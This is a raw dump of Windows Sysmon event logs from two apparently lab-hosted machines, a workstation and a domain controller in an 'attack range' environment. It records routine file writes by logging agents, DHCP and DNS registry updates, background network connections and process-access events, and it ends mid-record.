23542300x8000000000000000218699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:29.955{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=20FEECD94EAE22BAC5005AEBAEE71D46,SHA256=9E47D23BDF8E34180B4E9E8C7FD5CBEF55997A0FCF421647D9E18ED831EDEC23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:29.955{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=615A7C6DC13F592D550B25217FD373E1,SHA256=E5A9AA5BD5AD1D9A3E0E9C731EE82876EBFBA5C18FB11C9C459D76A2B13DDC33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:29.533{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9A9F2B8AF8583071D2769242015F46,SHA256=5F3332B2AC3512C59CC6A6FE85985C7F0F547AC776462D3E31347A62A7A66607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:30.595{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFA416802B9575276475D15009734DD2,SHA256=47ACBF832F3A342182A4B14D8703E1F8330EC26308FEFBC6972401AF1ED577A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:30.575{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FDC357FFAD554EDF498B0FEBCF49353,SHA256=68D492BA5EA194C183211AB8AF4DE0E28E7CEB86E64568B94BE693CA5FBC3C32,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.388{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x8000000000000000218700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:30.392{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2F5BD0D18C4FCA2C06CC193008CDE928,SHA256=4A06F3B228BBBDFFF2B8F2EDC584BFE7AB073CFE2B4AE35050BB827F4DF843DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:31.893{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6176F7AD58D33A6F2549023213F77F3,SHA256=7C9CCF5CB32F390ACF6D22B241AE7A57EE2846584FFE893E4AD5F3EE40EF5499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:31.846{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D7BD9B493FC87E96A512457BAD6FA07,SHA256=53844FEFDAAB582D1BF95F9284FB896450E0401E8C22CFC4B5AA782DCB0BC2DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:31.590{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B18CC47F754D6CEFDBE7CC0AFD426395,SHA256=91BCCC7359FA4E1038BB7360F4E821F1CEA1CEB5BD2DBEFEB1C32D128ED21F7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.701{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51478-false10.0.1.12-8000- 354300x8000000000000000218706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.494{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx57732-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000218705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.410{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:98a0:648:8cbc:ffff-50971-truee000:fc:108d:0:f88f:0:10a1:200-5355llmnr 354300x8000000000000000218704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:28.410{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:ad4f:96:d14b:8b64win-host-tcontreras-attack-range-985.eu-central-1.compute.internal50971-trueff02:0:0:0:0:0:1:3-5355llmnr 13241300x8000000000000000218703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:02:31.345{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a4-0xda870b17) 23542300x8000000000000000218711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:32.909{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC28B3F60CE7A3A1B47638BA0F15D5E4,SHA256=EB7CA05C7F9FD8F08770705B363722A82160D7825C9D96F1853D0E1C47457787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:32.874{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3FD65B074DBDC03D61602E0EAED0B1EF,SHA256=56F1F35F73636ADDE9892DCB6016644395183685101DD1C2ACE8BA9CFB2EF793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:32.874{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BF4F19E6D65A1E73AB1CD4164CFDCD63,SHA256=F1C779A908D73B1113488443DBBCB29FA0CEE6F23FB5555F47038DAC02FF2613,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:32.811{C8EA50B7-F11F-6215-1000-000000003802}364596C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:32.811{C8EA50B7-F11F-6215-1000-000000003802}364596C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:32.611{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95AA7235D2523A07971A606C8A0A3604,SHA256=7541E7EBA0F6972F37FA12971F750A7884FC07A2510792E15FD753192603A321,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:30.778{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal123ntpfalse169.254.169.123-123ntp 13241300x8000000000000000294439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.010{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000294438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.010{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000294437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.010{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000294436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.010{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\LeaseTerminatesTimeDWORD (0x62162258) 13241300x8000000000000000294435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.010{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\T2DWORD (0x62162096) 13241300x8000000000000000294434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.010{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\T1DWORD (0x62161b50) 13241300x8000000000000000294433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.010{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\LeaseObtainedTimeDWORD (0x62161448) 13241300x8000000000000000294432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.009{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\LeaseDWORD (0x00000e10) 13241300x8000000000000000294431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.009{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpServer10.0.1.1 13241300x8000000000000000294430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.009{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000294429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.009{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpIPAddress10.0.1.14 13241300x8000000000000000294428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:32.009{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpInterfaceOptionsBinary Data 23542300x8000000000000000294449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.796{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-145MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.642{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78127428D73A44922A2DBEE2D3B164B3,SHA256=02AB555B8BC6FC1255A651034C5CEDE7B20DE710C70D3CB7E4EB180CB0A17A05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.442{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=360D8187A22A3CD7D47FB12F374BC7F3,SHA256=FF9439C894814F2700CEDE7FBBD5A85E106CA2928357C368D2B7D433A4BBD7C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.042{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:33.026{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:34.791{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-146MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:34.642{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E8961EE6418278BAF4DEA01226B02E2,SHA256=B76BA9E7F20F0FB4AA0A8AA1A00A00F8F0737BF9C3E03CAAEDF6C209B22A0CF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:34.004{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B06B0D73C77DE4575E83379B4A72728,SHA256=009D18DA6186E20AEB3A89044B9B5906E361EF5F1C79A7902FBBAC3E2E39493A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000294465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000294464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\StaleAdapterDWORD (0x00000000) 13241300x8000000000000000294463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\CompartmentIdDWORD (0x00000001) 13241300x8000000000000000294462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\FlagsDWORD (0x00000002) 13241300x8000000000000000294461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\TtlDWORD (0x000004b0) 13241300x8000000000000000294460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\SentPriUpdateToIpBinary Data 13241300x8000000000000000294459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\SentUpdateToIpBinary Data 13241300x8000000000000000294458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\DnsServersBinary Data 13241300x8000000000000000294457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\HostAddrsBinary Data 13241300x8000000000000000294456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\PrimaryDomainNameattackrange.local 13241300x8000000000000000294455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\AdapterDomainName(Empty) 13241300x8000000000000000294454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:02:34.089{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\Hostnamewin-dc-tcontreras-attack-range-173 354300x8000000000000000294453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:31.501{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 